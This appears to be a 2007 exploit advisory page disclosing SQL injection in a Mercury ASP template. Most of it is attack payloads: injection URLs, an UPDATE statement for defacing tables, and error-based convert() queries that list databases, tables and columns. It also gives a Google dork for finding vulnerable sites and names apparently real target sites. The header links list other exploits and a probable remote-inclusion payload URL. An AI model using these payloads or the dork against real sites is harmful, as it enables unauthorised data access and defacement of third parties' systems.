Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Flashbb <= 1.1.7 - Remote File Inclusion Exploit

Entertainment CMS Admin Login Bypass

SYSTONÝCfr/porta l/ actualites.asp sql injection

http: //marmarahosting. org/infinity.txt

From:	okan alp <codexploder_(at)_hotmail.com>
Date:	10.07.2007
Subject:	MERCURY/Templates mercury.ASP SQL Injection

MERCURY/Templates mercury.ASP SQL Injection

Credit : Code[Xp]Loder'tq

mail   : codexploder[at]hotmail[dot]com

site   : Biyosecurity.net,expw0rm.com

thx    : BiyoSecurityTeam

#####################################################

1-)  example.com/[patch]/mercury.asp?page_id=1&newsid=(sql methot)

1-)  example.com/templates/mercury.asp?page_id=1&newsid=(sql methot)

-------------------------------------------------------------

2-) example.com/[patch]/mercury.asp?page_id=2&item=(sql methot)

2-) example.com/templates/mercury.asp?page_id=2&item=(sql methot)

2-) example.com/templates/mercury.asp?page_id=2&item=1'

2-) example.com/templates/mercury.asp?page_id=2&item=1 having 1=1

2-) example.com/templates/mercury.asp?page_id=2&item=1,2,3,4,5

2-) example.com/templates/mercury.asp?page_id=2&item=1,2,3,4,
5+update+tbl+set+column='your text or meta code';--

2-) example.com/templates/mercury.asp?page_id=2&item=1 group by tbl.column having 1=1

#for db : convert(int, db_name(1)
       
       : convert(int, db_name(2)

#for other tbl    : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))

#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))


#tbl    : V_news_LASTVERSION
#column : title,pictures,date,email,vs

##########################################################

demo site: http://www.pyxis-discovery.com/

google search code : inurl:"mercury.asp?page_id"

example site : http://www.radtech-europe.com